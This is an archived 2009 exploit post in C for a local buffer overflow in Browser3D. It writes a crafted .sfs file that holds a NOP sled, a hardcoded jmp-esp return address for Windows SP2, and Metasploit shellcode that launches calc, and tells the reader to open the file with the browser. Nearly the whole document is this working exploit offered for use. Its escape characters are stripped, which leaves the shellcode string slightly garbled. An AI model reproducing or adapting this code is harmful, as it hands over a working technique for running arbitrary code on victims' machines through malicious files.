browser3d-overflow.txt
Posted on 21 January 2009
#include<stdio.h> #include<string.h> #include<windows.h> /* Browser3D local BOF exploit * coded by SimO-s0fT ( maroc-anti-connexion@hotmail.com) *greetz to: all friends & all morroccan hackers *special tnx for ZAML str0ke /* win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc2" "xf8x23x02x83xebxfcxe2xf4x3ex10x67x02xc2xf8xa8x47" "xfex73x5fx07xbaxf9xccx89x8dxe0xa8x5dxe2xf9xc8x4b" "x49xccxa8x03x2cxc9xe3x9bx6ex7cxe3x76xc5x39xe9x0f" "xc3x3axc8xf6xf9xacx07x06xb7x1dxa8x5dxe6xf9xc8x64" "x49xf4x68x89x9dxe4x22xe9x49xe4xa8x03x29x71x7fx26" "xc6x3bx12xc2xa6x73x63x32x47x38x5bx0ex49xb8x2fx89" "xb2xe4x8ex89xaaxf0xc8x0bx49x78x93x02xc2xf8xa8x6a" "xfexa7x12xf4xa2xaexaaxfax41x38x58x52xaax08xa9x06" "x9dx90xbbxfcx48xf6x74xfdx25x9bx42x6exa1xf8x23x02"; int main(int argc,char *argv[]){ printf(" ===>viva marrakesh city<=== "); FILE *openfile; char exploit[430]; char junk[262]; char ret[]="x68xD5x857C";//jmp kernel32.dll esp (windows trust sp2) char nop[]="x90x90x90x90"; memset(junk,0x90,262); memcpy(exploit,junk,strlen(junk)); memcpy(exploit+strlen(junk),ret,strlen(ret)); memcpy(exploit+strlen(junk)+strlen(ret),nop,strlen(nop)); memcpy(exploit+strlen(junk)+strlen(ret)+strlen(nop),scode,160); openfile=fopen("simo.sfs","wb"); if(openfile==NULL){ perror("can't opening this file "); } fwrite(exploit,1,sizeof(exploit),openfile); fclose(openfile); printf("file created ....!" "open it whit Browser3d"); return 0; }
